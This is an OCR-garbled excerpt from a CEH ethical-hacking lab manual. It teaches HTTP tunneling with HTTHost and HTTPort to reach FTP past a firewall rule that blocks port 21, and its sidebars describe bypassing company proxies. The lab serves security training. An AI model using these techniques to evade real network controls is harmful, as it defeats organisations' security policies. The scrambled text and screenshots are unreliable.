£ ‫־‬:c -T ‫;'׳‬g .‫־‬ ', o'c y 1 :c • ■er: -vb1 ?‫־‬n; ' r ‫׳‬c t.:• r: ; 0 ‫־‬ ‫־‬ 0^ ‫־‬ F IG U R E 1 4 2 : S to p p in g W o r ld W id e W e b S e rv ic e s in W in d o w s S e rv e r 2008

‫ ט‬It supp orts stro n g tra ffic e n cryp tio n , w h ic h m akes proxy logging useless, and suppo rts NTLM and o th e r a u th e n tic a tio n schem es.

4.

“ CEH-Tools" Z:\CEHv 8 M odule 03 Scanning N etw orks\T unneling Tools\H TTH ost
O p e n M a p p e d N e tw o r k D r iv e O pen T lie

5.

H TTHost

fo ld e r a n d d o u b le c lic k

htthost.exe . O ptions
ta b .

6.
7.

H TTH ost

w i z a r d w i l l o p e n ; s e le c t d i e

O n d ie

O ptions

t a b , s e t a l l d i e s e t t in g s t o d e f a u l t e x c e p t

Personal

Passw ord fie ld ,

w h i c h s h o u l d b e f i l l e d i n w i t h a n y o t h e r p a s s w o r d . 111 d i i s

la b , d ie p e r s o n a l p a s s w o r d is

k m a g ic.'?

C E H Lab M anual Page 223

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

8.

C h e c k d ie

R evalidate DNS nam es

and

Log C onnections

o p t io n s a n d c lic k

A pply
HTTHost 1.8.5
N etw ork B ind lis te n in g to : P o rt: B ind e x t e r n a l to :

|0.0.0.0
Allow a c c e s s fr o m :

[80

10.0.0.0
P e r s o n a l p a s s w o rd :

10.0.0.0
[‫־‬ P a s s th r o u g h u n r e c o g n iz e d r e q u e s t s to : P o rt: O rig in a l IP h e a d e r fie ld : | x ‫ ־‬O rig in a l‫ ־‬IP

H o s t n a m e o r IP :

1127.0.0.1

|81
T im e o u ts :

& To s e t up H TTPort need to p o in t yo u r b ro w s e r to 127.0.0.1

M ax. local b u ffe r:

‫־‬3

|0= 1‫־‬2

R e v a lid a te DNS n a m e s Log c o n n e c tio n s ‫־‬
Apply

S ta tis tic s ] A p p lic a tio n log | ^ 3 p tio n s jj" S e c u r'ty | S e n d a G ift)
F IG U R E 14.3: H T T H o s t O p tio n s tab

9.

N o w le a v e

HTTHost

in ta c t, a n d d o n ’t t u r n o f f

W indow s S erver 2008

V i r t u a l M a c h in e . 10. N o w s w itc h to fio m

W indow s Server 2012 H ost M achine,
a n d d o u b le - c lic k

a n d in s t a ll H T T P o r t

D:\CEH-Tools\CEHv 8 M odule 03 Scanning N etw orks\Tunneling h ttp o rt3 sn fm .e xe

Tools\H TTPort & H TTPort goes w ith th e predefined m apping "E x te rn a l HTTP p ro xy‫ ״‬o f local po rt

1 1 . F o llo w d ie w iz a r d - d r iv e n 1 2 . L a u n c h th e

in s ta lla tio n steps.

S ta rt

m e n u b y h o v e r in g d ie m o u s e c u r s o r i n th e lo w e r - le f t

c o r n e r o f th e d e s k to p .

F IG U R E 14.4: W in d o w s S e rv e r 2012 - D e s k to p ^ ie w

1 3 . C lic k d ie

HTTPort 3.SNFM

a p p t o o p e n d ie

HTTPort 3.SNFM

w in d o w .

C E H Lab M anual Page 224

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

5 t3 ft

Administrator

Server Manager

Windows PowerShell

Google Chrome

Hyper-V Manager

HTTPort 3.SNPM 1

T ools d e m on stra te d in th is lab are a va ila b le in D:\CEHTools\CEHv 8 M odule 03 Scanning N e tw o rks

i.
Con>puter

m
Control Panel

»
Wyper-V Virtual Machine...

91
SOI Server incaknor Cent•!.‫״‬

*‫נ‬ £
■ “ ‫יי ■ ״ ״‬-

V
Command Prompt M 021IU Firefox

n
Nctwodc

F‫־‬ ‫־‬ ‫־‬

©
Proxy Workbea. -T

if
MegaPng

*8
F IG U R E 14.5: W in d o w s S e rv e r 2012 - A p p s

14. T h e

HTTPort 3.SNFM

w in d o w a p p e a rs as s h o w n i n d ie fig u r e d ia t f o llo w s .

HTTPort 3.SNFM

'‫ ־‬r°
Port:

S y s te m j Proxy :j por^ m a p p in g | A bout | R e g iste r | HTTP proxy to b y p a s s (b la n k = dire c t o r firewall) H ost n a m e o r IP a d d r e s s :
F o r e a c h s o ftw a re to c re a te c u s to m , g iv e n a ll th e a d d re sse s fro m w h ic h it o p e ra te s . F o r a p p lic a tio n s th a t a re d y n a m ic a lly c h a n g in g th e p o rts th e re S o c k s 4 - p ro x y m o d e , in w h ic h th e s o ftw a re w ill c re a te a lo c a l s e rv e r S o c k s (1 2 7 .0 .0 .1 )

Proxy re q u ire s a u th e n tic a tio n U se rn a m e : P assw ord!

Misc. o p tio n s U ser-A gent: IE 6 .0 B ypass m o d e :

U se p e rs o n a l re m o te h o s t a t (b la n k = u s e public) H ost n a m e o r IP a d d r e s s : Port: P assw ord:

I------------------------------ P
?
\ 4

I-------------S tart

— This b u tto n h elp s

F IG U R E 14.6: H T T P o r t M a in W in d o w

1 5 . S e le c t d i e m a c h in e .

Proxy

ta b a n d e n te r d ie

h ost nam e

or

IP address

o f ta rg e te d

1 6 . H e r e as a n e x a m p le : e n t e r

address,

a n d e n te r

W indow s Server 2008 Port num ber 80
and

v ir t u a l m a c h in e

IP

1 7 . Y o n c a n n o t s e t d ie 1 8 . 111 d i e

Usernam e

Password

f ie ld s .

U ser personal rem ote host a t

s e c tio n , c lic k

s ta rt and

d ie n

sto p

and

d ie n e n te r d ie ta r g e te d b e 80.

H ost m achine IP address

a n d p o r t , w h ic h s h o u ld

C E H Lab M anual Page 225

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

19 . H e r e a n y p a s s w o r d c o u ld b e u s e d . H e r e a s a n e x a m p le : E n t e r d ie p a s s w o r d as

‘*m agic‫״‬ r|a
S y s te m

In real w o rld environm ent, people som e tim e s use passw ord p ro te c te d pro xy to m ake com pany em ployees to ac c e s s th e In terne t.

HTTPort3.SNFM | 3

' ‫־‬

x

Proxy | p 0 rt m a p p in g | A bout | R e g iste r |

HTTP p roxy to b y p a s s (b la n k = direct o r firewall) H ost n a m e o r IP a d d re s s : | 1 0 .0 .0 .4 Proxy re q u ire s a u th e n tic a tio n U s e rn a m e : P assw ord: Port: |8 0

Misc. o p tio n s U se r-A g en t: | IE 6 .0 B y p ass m o d e : | R e m o te h o s t

U se p e rs o n a l re m o te h o s t a t (b la n k * u s e public) H ost n a m e o r IP a d d re s s : |1 0 .0 .0 .4 *ort: P a s sv » rd :

I 8 0

|............1
S ta rt

? | <—T his b u tto n h e lp s

F IG U R E 14.7: H T T P o r t P ro x v settin g s \ rin d o w

2 0 . S e le c t d ie

Port M apping
*‫ב‬
S y s te m | Proxy

ta b a n d c lic k

Add

t o c re a te

N ew M apping

HTTPort 3.SNFM 1 - 1 °
Port m a p p in g A bout | R e g iste r J Static T C P /IP p o rt m a p p in g s (tu n n e ls ) Q New m a p p in g Q Local po rt

1 ‫ םייים‬1

1-0
Q H T T H o s t s u p p o rts th e r e g is tra tio n , b u t it is fre e a n d p a s s w o rd - fre e - y o u w ill b e is s u e d a u n iq u e ID , w h ic h y o u c a n c o n ta c t th e s u p p o rt te a m a n d a sk y o u r q u e s tio n s .

(3 R e m o te h o s t — re m o te , h o s t, n a m e □ R e m o te port

1_0
S e le c t a m a p p in g to s e e sta tistic s : No s ta t s - s e le c t a m a p p in g n /a x n /a B /sec n /a K Built-in SOCKS4 se rv e r
W

LEDs:

‫□□□ם‬ O Proxy

R un SOCKS s e rv e r (p o rt 108 0 ) Full SOCKS4 s u p p o rt (BIND)

A vailable in "R e m o te H ost" m o d e : r

? | 4— This b u tto n h e lp s

F IG U R E 14.8: H T T P o r t cre a tin g a N e w M a p p in g

2 1 . S e le c t

N ew M apping Node,

a n d r ig h t- c lic k

N ew Mapping,

a n d c lic k

Edit

C E H Lab M anual Page 226

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

HTTPort 3.SNFM
S y s te m | Proxy

T33
Add R em o v e

m a p p in g | A bout | R e g iste r |

Static T C P /IP p o rt m a p p in g s (tu n n e ls ) New m a o □ Local p Edit 0 ■ 0 R e m o te h o s t re m o te , h o s t, n a m e (=J R e m o te po rt

‫ש‬
Tools d em o nstrate d in th is lab are ava ila b le in D:\CEHTools\CEHv 8 M odule 03 Scanning N e tw o rks

L_o
S e le c t a m a p p in g to s e e sta tistic s : No s ta ts - s e le c t a m a p p in g n /a x n /a B /sec n /a K Built-in SOCKS4 s e rv e r
W

LEDs:

□ □□□ O Proxy

R un SOCKS s e rv e r (p o rt 1080) Full SOCKS4 s u p p o rt (BIND)

A vailable in " R e m o te H ost" m o d e : r

? |

4—

T his b u tto n h e lp s

F IG U R E 14.9: H T T P o r t E d itin g to assign a m a p p in g

2 2 . R e n a m e th is t o c lic k

ftp c e rtifie d hacker, 21

a n d s e le c t

Local p o rt node;

th e n lig h t-

E dit

a n d e n te r P o r t v a lu e t o

2 3 . N o w r ig h t c lic k o n

R em ote h o st node ftp .c e rtifie d h a c k e r.c o m R em ote p o rt

to

E dit

a n d r e n a m e i t as

2 4 . N o w r ig h t c lic k o n

n o d e to

E dit
-

a n d e n te r d ie p o r t v a lu e t o 1° r x

21

1
r* 1 S y s te m | Proxy

HTTPort 3.SNFM

Port m a p p in g | A bout | R e g iste r |

r Static T C P /IP p o rt m a p p in g s (tu n n e ls ) 1 =1 •.•‫=•׳‬. 5 -2 1

/s

Add R em o v e

0 ‫ ־‬Local p o rt 0 R e m o te h o s t
ftp .c e rtifie d h a c k e r.c o m R e m o te port I—21 S e le c t a m a p p in g to s e e s ta tistic s : No s ta ts - inactive n /a x n /a B /sec
dulit‫־‬in

S In th is kind o f environm en t, th e fe d e ra te d search w e b p a rt of M ic ro s o ft Search Server 2008 w ill n o t w o rk out-ofthe-box because w e o n ly suppo rt non-passw ord p ro te c te d proxy.

=
V LEDs:

n /a K

‫□□□ם‬
O

Proxy

server
SOCKS s e rv e r (p o rt 1 080)

1

W R un
I”

A vailable in " R e m o te H ost" m o d e : Full SOCKS4 s u p p o rt (BIND)

J

? |

T his b u tto n h e lp s

F IG U R E 14.10: H IT P o r t S ta tic T C P / IP p o rt m a p p in g

2 5 . C lic k

S ta rt

o n d ie

Proxy

ta b o f H T T P o r t t o m i l d ie H T T P tu n n e lin g .

C E H Lab M anual Page 227

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

HTTPort 3.SNFM ‫־‬r a :
S y s te m ^ o x y | Port m a p p in g | A bout | R e g iste r |

- HTTP proxy to b y p a s s (b la n k = dire c t o r firewall) H ost n a m e o r IP a d d r e s s : |1 0 .0 .0 .4 Proxy re q u ire s a u th e n tic a tio n U s e rn a m e : P assw ord: Port: [80

Misc. o p tio n s U ser-A gent: IE 6 .0 ‫נ ד‬ B y p ass m o d e : [ R e m o te h o s t

U se p e rs o n a l re m o te h o s t a t (b la n k = u s e public) H ost n a m e o r IP a d d r e s s : Port: P assw ord:

|10.0.0.4
? | ^— T his b u tto n h e lp s

[So

‫*״***ן‬

( J3 H T T P is th e b a sis fo r W e b s u rfin g , so i f y o u c a n fr e e ly s u r f th e W e b fro m w h e re y o u axe, H T T P o r t w ill b rin g y o u th e re s t o f th e In te r n e t a p p lic a tio n s .

F IG U R E 14.11: H T T P o r t to start tu n n e lin g

2 6 . N o w s w it c h t o d ie

W indow s S erver 2008

v ir t u a l m a c h in e a n d c lic k d ie

A p p lic a tio n s log

ta b .

2 7 . C h e c k d ie la s t lin e i f p r o p e r ly .

L is te n e r liste n in g a t 0.0.0.0:80,

a n d d i e n i t is m i m i n g

HTTHost 1 A 5
A p p lic a tio n lo g : M A IN : H T T H O S T 1 . 8 . 5 P ER S O N A L G IF T W A R E D E M O s t a r t i n g ^ M A IN : P r o je c t c o d e n a m e : 9 9 re d b a llo o n s M A IN : W r it t e n b y D m it r y D v o in ik o v M A IN : ( c ) 1 9 9 9 - 2 0 0 4 , D m it r y D v o in ik o v M A IN : 6 4 t o t a l a v a ila b le c o n n e c t io n ( s ) M A IN : n e tv /o r k s t a r t e d M A IN : R S A k e y s in it ia liz e d M A IN : lo a d in g s e c u r ity f i l t e r s . . . M A IN : lo a d e d f i l t e r " g r a n t . d l l " ( a llo w s a ll c o n n e c tio n s w ith in M A IN : lo a d e d f i l t e r " b l o c k . d l l " ( d e n ie s al I c o n n e c tio n s w ith ir M A IN : d o n e , t o t a l 2 f i l t e r ( s ) lo a d e d M A IN : u s in g t r a n s f e r e n c o d i n g : P r im e S c r a m b le r 6 4 / S e v e n T e g r a n t . d l l: f ilt e r s c o n e c tio n s b lo c k . d ll: f ilt e r s c o n e c tio n s !L IS T E N E R : lis t e n in g a t C.C.0.C:sT|

Q

T o m a k e a d a ta tu n n e l

th ro u g h th e p a s s w o rd p ro te c te d p ro x y , s o w e c a n m a p e x te rn a l w e b s ite to lo c a l p o rt, a n d fe d e ra te th e s e a rc h re s u lt.

z]
S ta tis tic s

( Application log

O p t io n s

S e c u r ity | S e n d a G ift

F IG U R E 14.12 H T T H o s t A p p lic a tio n lo g se ctio n

2 8 . N o w s w it c h t o d ie

W indow s S erver 2012

h o s t m a c h in e a n d t u r n

ON

d ie

W indow s F irew all
2 9 . G o t o W in d o w s F ir e w a ll w it h

A dvanced S e cu rity

C E H Lab M anual Page 228

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

3 0 . S e le c t

O utbound rules f r o m d i e l e f t p a n e o N ew Rule i n d i e r i g h t p a n e o f d i e w i n d o w .
View Help

f d ie w in d o w , a n d d ie n c lic k

Windows Firewall v/ith Advanced Security
Fie Action

■ -:°‫ ־‬- ‫־‬

W in d o w sF i r c w . 5 1 1 w ithA d v ! Q In b o u n dR u in
■ Outbound Rules |

Outbound Ruin Name Group BranchCache- Content Retr... BranchCache - Hosted Cech BranchCache - Hosted C ad i. BranchCache - PeerOtscove... Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Profile Al Al Al Al Al Al Al Deane■! Domain Dcm5»1 Al Al Al Al Al Al Al Al Al Al Al Al Al Al tnatfed A No No No No Vet ■ Yes rei Ves Yes Yes Yes Yes Ves Ves Yes Ves Yec Ves Ves Ves Ves Vet Yes Vet O utbound Rule* New Rule...
V Filter by Profile

‫ ^ •ן‬Monitoring

©B'anchCache Content R«t1 i«val (HTTP.O... C o n n e c tio nS e c u r ityR u© BranchC ache Horted Ca<t* Cbent IHTT... ©BranchCache Hosted Cache Se»ve1(HTTP. ©BranchC ache Peer Dncovery (WSDOut) © C o ‫׳‬e Networking •DNS <U0P-0ut) © Core Networking- D > 1 v> m -e Config... © Core Networking ‫ ־‬Dynamic Host Config... ©CoreNetworkng ‫ ־‬Grcup Policy (ISA5S‫~־‬ © Core Networking - 5‫׳‬cup Poky (NP-Out) ©CoreNetworkeig - Group Policy CTCP-O-. © Core Networking - Internet Group Mana...

V

Filter by State

7 F ilte rb yG r o u p
View O Refresh Export List... Q Help

£ ‫ ז‬T ools d em o nstrate d in th is lab are ava ila b le in D:\CEHTools\CEHv 8 M odule 03 Scanning N e tw o rks

© Core Networking ‫ ־‬IPHT7PS (TCP-Out] © Core Networking- IP v ffM C u l) © Core Networkng ‫ ־‬Mulbcost listener Do-. © Core Networking - Mulocast Listener Qu~ © Core Network*!g -Mufceost listener Rep~ © Core Networking •Mutecjst Listener Rep... © Core Networking - Neighbor Dncovery A... Core Networking © Core Networking *fc1 (j‫־׳‬oo‫ ׳‬Ceccvery S... Core Networking © Core Networkrig ‫ ־‬Packet loo Big (ICMP-. Core Networking © Core Networking Par3meterProblem (1- Core Networking © Core Networking - ficutet Advertnement... Care Networking © Core Networking - P.cuur Soictaeon (1C.. Core Networking © Core Networkng - Itird o iLOP-Outl Core Networking

"■ i

T

r" .......

‫ז‬-

v'

F IG U R E 14.13: W in d o w 's F ire w a ll w ith A d v a n c e d S e c u n ty w in d o w in W in d o w s S e rv e r 2008

3 1 . 111 d i e

N ew Outbound Rule W izard, N ext

s e le c t d i e

Port

o p t io n in d ie

Rule Type

s e c tio n a n d c lic k

New O utb o u n d Rule Wizard
p R u le T y p e Select the type cf firewall rule to create Steps. ■ j Rule Type What :ype d rue wodd you like to create?

w Protocol and Ports « Action « « Profle flame O Program Rde Bidt controls connections for a program. ‫ >§י‬Port | RJe W controls connexions for a TCP or UDP W . O Predefined: | BranrhCacne - Content Retrieval (Ueee HTTP) RUe t a controls connections for a Windows experience O Custom Cu3tomrJe v 1

S Tools d em o nstrate d in th is lab are ava ila b le in Z:\ Mapped N e tw o rk D rive in V irtu a l M achines

< Beck

Next >

11

Cancel

F IG U R E 14.14: W in d o w s F ire w a ll se lectin g a R u le T y p e

C E H Lab M anual Page 229

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

32. N o w

s e le c t

All re m o te ports

in

d ie

P rotocol and Ports

s e c tio n , a n d c lic k

N ext
New Outbound Rule Wizard P ro to co l and Porta
Specify the protocols and ports to which ths r ie apofes
Steps

+ Ru• 'yp•

D o e st ‫־‬ * sr u l ea o p f / t oTCPo rUDP?
< !•> TCP

4P r c t o c o la n dP o r t s
4
Acaor

OU D P
Does tnis nie aoply tc all remote ports or specific renote port*9
!? m o te p o d s

4P r o f i l e
4
Q H T T P o r t d o e s n 't r e a lly Name

c a re f o r th e p ro x y as s u c h , i t w o rk s p e r fe c tly w ith fire w a lls , tra n s p a re n t a c c e le ra to rs , N A T s a n d b a s ic a lly a n y th in g th a t le ts H T T P p r o to c o l th ro u g h .

O Specific re m o tep o rts :
Example 80.443.5000-5010

< E a c x

Ned >

Cancel

F IG U R E 14.15: W in d o w s F ire w a ll assig n in g P ro to c o ls an d P o rts

3 3 . 111 d i e

A c tio n

s e c t i o n , s e le c t

d ie

B lo ck th e c o n n e c tio n '’

o p t io n a n d c lic k

N ext
New O utbound Rule Wizard

Action Q Youn eedtoinstall h tth o st onaPC, w hois g en erally accessib leonth eInternet typicallyyour "hom e" PC. This m e a n s th at if yon sta rte da W eb server o n th eh o m e PC, everyo n ee lsem u st b ea b leto co nnect toit. There aretw o sh o w sto p p ers for h tth ost o n h o m ePCs
Specify the acton to be taken when ‫ ס‬connect!:>n notches the condticno specified in the n ie .

Steps:
4

HUe Type
Protocol and Porta

What acbon ohodd b« taken whon a connexion match08 tho opochod conoticno7

4

4 Action

OA lowttv co n n ectio n
Tho nclxJes cornoctiona that 0‫ סו‬piotectod wth IPaoc 09 wel cs t103‫׳‬c otc not.

4
4

Profile Name

OA lowItic cwviediui If M Is secuie
Ths ncbdes only conredions that have been authent1:ated by usng IPsec. Comecticns wil be secued using the settngs in IPsec p‫־‬op5rtes and nJes r the Correction Security RuteTode.

'• )

H o c k th e c o n n e c tio n

C E H Lab M anual Page 230

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 14.16: Windows Firewall setting an Action 3 4 . 111 d i e

P rofile s e c t i o n , Domain, Public. P rivate

s e le c t

a ll

th re e

o p tio n s .

The

r u le

w ill

a p p ly

to :

a n d d ie n c lic k

N ext
*

Q N A T /firew all issues: You need to enable an inco m in g p ort. For H TThost it w ill ty p ic a lly be 8 0(h ttp ) or 44 3(https), but any po rt can be used - IF the HTTP p ro xy a t w o rk sup p orts it ‫־‬ som e proxys are c o nfig ured to a llo w o n ly 80 and 443.

New O utb o u n d Rule Wizard

Profile
Specify the prof les for which this rule applies

Skin
* Ru*Typ#

When does #‫ מו‬rule apply7

4 3r c t o c o la n cP o r t s
# *cbor
3rcfile

171 Daman Vpfces *I en a computer is connected to Is corporate doman.

0 Private
3ppies wt en a computer is connected to a pivate oetwak bcabcn. such as a home orworcpi ce

B Public
Vp*‫״‬ c3

0‫ ד‬a ccmputcr io cconcctcd to a pjblc nctwoiK kcooon

c Eacx

Next >

Cancel

F IG U R E 14.17: W in d o w s F ire w a ll P ro file setting s

ZZy Tools d em o nstrate d in th is lab are a va ila b le in D:\CEHTools\CEHv 8 M odule 03 S canning N e tw o rks

35. T y p e

P ort 21 B locked

i n d ie

Nam e

fie ld , a n d c lic k

Finish

New O utbound Rule Wizard N am e S 06dfy the rams and desorption of this lie.

None
|?or. 2 ' B b d c e J Desaiption (optional):

£ 3 T h e d e fa u lt T C P p o r t fo r F T P c o n n e c tio n is p o r t 2 1. S o m e tim e s th e lo c a l In te r n e t S e rv ic e P r o v id e r b lo c k s th is p o r t a n d th is w ill re s u lt in F T P

< Back

Finish

Cancel

C®W<EAfl*1MaW&al Page 231

E th ic a l H ackin g and Counterm easures Copyright C by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 14.18: W in d o w s F ire w a ll assig n in g a n am e to P o e t

3 6 . T h e n e w m le

Port 21 B locked

is c r e a t e d a s s h o w n i n d i e f o l l o w i n g f i g u r e .

Windows Firewall with Advanced Security
Fie Action View Hdp

1-1“ 1 * :

Windows Firewall with Adv; C nfcound Rules Na C Outbound Rules [O^Port 2 1 Blocked Connection SecuntyRul ©BranchCache Content Rctrcvtl (HTTP-0.. BranchCache •Content Retr.. t Monitoring ^ Branch(a 1he Hotted Cache Client (H it . Branch( at hr •Hotted ( ach
^

Actions

Outbound Rules

A l :1 A l A l A l A l
Domain

New Rule...

V
V

Filter by Profit•
Fliter by Stirte Filter by Group View

H T T P o r t d o e s n 't re a lly

c a re f o r th e p ro x y as su ch : i t w o rk s p e r fe c tly w ith fire w a lls , tra n s p a re n t a c c e le ra to rs , N A T s a n d b a s ic a lly a n y th in g th a t le ts th e H T T P p ro to c o l th ro u g h .

0 BianchCach* Hosted Cache $erv*1(HTTP... BranchCach• •HuiteJCach ©BranchCache Peer Cn<o.er/ //SD Cut) BranchCache •Peer Discove.. © Core Networking ‫ ־‬DNS(UDP-OutJ Core Networking © C o ir Networking- Dynamic Hod Config.. Core Networking © Core Networking -Dynamic Host Corvfig... Core Networking © Core Networking -Group Pcfccy CLSASS-- Core Networking @PCore Netwoit'ing - Grcup PcEcy (fJP-Out) © Core Networking - Group Poicy (TCP-O-. Core Networking © Core Networking - internet Group Mana... © Core Ndwwiing- lPHTTPS(TCP-OutJ © Core Networking (Pw6-0ut) Core Networking Cote Networking Core Networking

Al

V

(Oj Refresh [a» Export List...
Li Help

C o r eN e tw o r k in g

D o m a in
Domain

A l A l
Al

Po rt 2 1B lo ck e d
* Disable Rule

© Core Networking Listener Do‫ ״‬Core Networking © Core Networking Muh < yt* listener O j‫״‬. Core Networking © Cote Networking -Mul!< aU Iktenet Rep. Core Networking © Cor« Networking •Vuh cast .!s:«n«r Rep. Cor• Networking © Core Networking rfcignfccf Discovery A... Core Networking tmg ‫ ־‬Meaghbct Discoveiy 5 , Core Networking © C or.1 NetmD1 © C 016 Nstworking - Pe.ktlT v. Big K M P .. © Core Networking - Parameter Protolem (I.. sement... © Core Networking ‫ ־‬Router A<hert1 © Core Networking -Router SoKckation (1C... CortNttwQiking Core Networking Core Networking Core Networking

A l A l A l A l
Al

4 c u t
Gfe Copy

X
(£ | U

D«l«t« Propeitie* Help

A l
Al

A l A l A l

F IG U R E 14.19: W in d o w s F ire w a ll N e w ru le

3 7 . R i g h t - c l i c k d i e n e w l y c r e a t e d r u l e a n d s e le c t

P roperties

*
File Action View Hdp

W indows Firewall w ith Advanced Security

* ‫►י‬

^

q

!
I Actions
Name
O.P01t21 Blocked

g f Windows Firewall with Adv; f t inbound Rules O Outbound Rules

Group

*

Profie Disable Rale

Ervsl

Outbound Rules
New Rule... V V V Filter by Profile Filter by State Fliter by Group Vi*w jO! Refresh

-

C o n n e c tio nS e c u rityR u l X / M o n ito r in g

^BranchCache Content Retrieval (HTTP-O‫״‬. Branc hCac he ‫ ־‬Cor ©BranchCache Hosted Cache Ciem(HTT‫״‬.
BranchCache - Hos Cut Copy Delete Properties Hdp Dom*n Dom»n Dom»n Al Al Al Al Al Al Al Al Al Al Al Al Al Yet Ves Yes Yet Yes Yes Yes Yes Yes Yes Yes Yes Yb Yes YCS Yes

► ► ► ►

S

H T T P o r t th e n

in te rc e p ts th a t c o n n e c tio n a n d ru n s it th ro u g h a tu n n e l th ro u g h th e p ro x y .

©BranchCache Hosted Cechc Saver(HTTP_ BranchCache ‫ ־‬Ho: ©BranchCache Peet Disccvay (WSD-Ckjt) BranchCache - Pee Core Networking © Cote Networbng - Df5 (U0P-0ut) © Core Networking D>rwm : Host Ccnfig. Lore Networking © Core Networbng •D>neo>c Most Config... © Cote Networbng •Group Policy (ISASS-... ©Core Networking Group Policy (NP-Out) © Core Networbng Group PolKy(TCP-0.© Core Networbng •Internet Group kbiu.. ©Core Networbng IPHTTPS(TCP-0ut) © Core Networbng -IPv6 (1 P»‫׳‬$‫<־‬XjtJ © C oie Netwoibng -Mufticsst Listener Do... © Core Networbng - Multicast Listener Qu...
Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking Core Networking

^

Export Litt... Help -

Q

Port 21 Blocked
♦ Disable Rule 4 c ‫״‬t

• 41 Copy X Delete Properties 0 Help

©CoreNerwcrbng -MJbcsst Listener Rep... Core Networking © Cote Netwoibng - Mulbcest Listener Rep... Core Networking © Core Networbng - Neighbor Discovery A‫״‬. Core Networking © Core Networbng Neighbor Discovery S... Core Networking I^ C cie Netwoibng ■Packet Too Big (ICMP... Core Networking © Cote Networbng •Parameter Problem (1 ‫ ״‬Core Networking © Core Networbng Reuter Atf^trtscment.- Core Networking © Core Netwoibng * Rcotei Sol*‫׳‬tation (1C~ Core Networking
r ... n -.----- 11—

the properties dialog box foi the tuner it ^le»un

F IG U R E 14.20: W in d o w s F ire w a ll n e w ru le p ro p e rtie s

3 8 . S e le c t d i e
£ 7 E n a b le s y o u to b yp a ss y o u r H T T P p ro x y in ca se it b lo c k s y o u fro m th e In te r n e t

P rotocols and P orts t a b . C h a n g e d i e R em ote Port S p e cific P orts a n d e n t e r d i e Port num ber a s 21 A pply

o p tio n to

3 9 . L e a v e d i e o t h e r s e t t in g s a s d i e i r d e f a u l t s a n d c l i c k

d ie n c lic k

OK.

C E H Lab M anual Page 232

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Port 21 Blocked Properties
jerteral_________Pngams and Services
Protocolt and Fore FVwocob and po*s Prctocdtype: Prctocd runber | Scope | Advancec

* ‫ד‬
Remote Conpjiefs
j Local Princpab

Loco port

All Potto

Exampb. 80. 443.5003-5010 Remote port

S p e c ifeP a ts [2 1
Example. 80. 443.5003-5010 I Custonizo.

hten‫־‬et Gortnd Message Protocol (CMP)«ting*: i— ‘ W it h H T T P o r t , y o u c a n u se v a rio u s In te r n e t s o ftw a re fr o m b e h in d th e p ro x y , e .g ., e - m a il, in s ta n t m e sse n g e rs, P 2 P file sh a rin g , IC Q , N e w s , F T P , IR C e tc . T h e b a s ic id e a is th a t y o u se t u p y o u r In te r n e t s o ftw a re

F IG U R E 14.21: F ire w a ll P o r t 21 B lo c k e d P ro p e rtie s

40. T yp e

ftp ftp .c e rtifie d h a c k e r.c o m i n t h e c o m m a n d p r o m p t a n d p r e s s Enter. T h e c o n n e c t i o n i s b l o c k e d i n W indow s Server 2008 by fire w a ll

£ 3 H T T P o r t d o e s n e ith e r fre e z e n o r h a n g . W h a t y o u a re e x p e rie n c in g is k n o w n as ‫ ״‬b lo c k in g o p e ra tio n s ”

F IG U R E 14.22: ftp c o n n e c tio n is b lo ck e d

4 1 . N o w o p e n d ie c o m m a n d p r o m p t m a c h in e a n d ty p e

0 11 d i e W indow s S erver 2012 h o s t

ftp 127.0.0.1

a n d p re s s

E nter

7 ^

H T T P o r t m a k e s it

p o s s ib le to o p e n a c lie n t sid e o f a T C P / IP c o n n e c tio n a n d p ro v id e it to a n y s o ftw a re . T h e k e y w o rd s h e re a re : "c lie n t " a n d "a n y s o ftw a re ".

C E H Lab M anual Page 233

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E 14.23: E x e c u tin g ftp co m m a n d

L a b

A n a ly s is
a d d re s s e s , o p e n p o r t s a n d r u n n in g a p p lic a tio n s , a n d p r o t o c o ls

D o c u m e n t a ll d i e I P

y o u d i s c o v e r e d d u r i n g d i e la b .

T o o l/U tility

In f o r m a tio n

C o lle c t e d / O b je c t iv e s A c h ie v e d

P r o x y s e r v e r U s e d : 1 0 .0 .0 .4 H T T P o rt P o rt s c a n n e d : 80 R e s u lt: f t p 1 2 7 .0 .0 .1 c o n n e c t e d t o 1 2 7 .0 .0 .1

P L E A S E

T A L K

T O

Y O U R

I N S T R U C T O R T O T H I S

I F

Y O U

H A V E

Q U E S T I O N S

R E L A T E D

L A B .

Q u e s t io n s
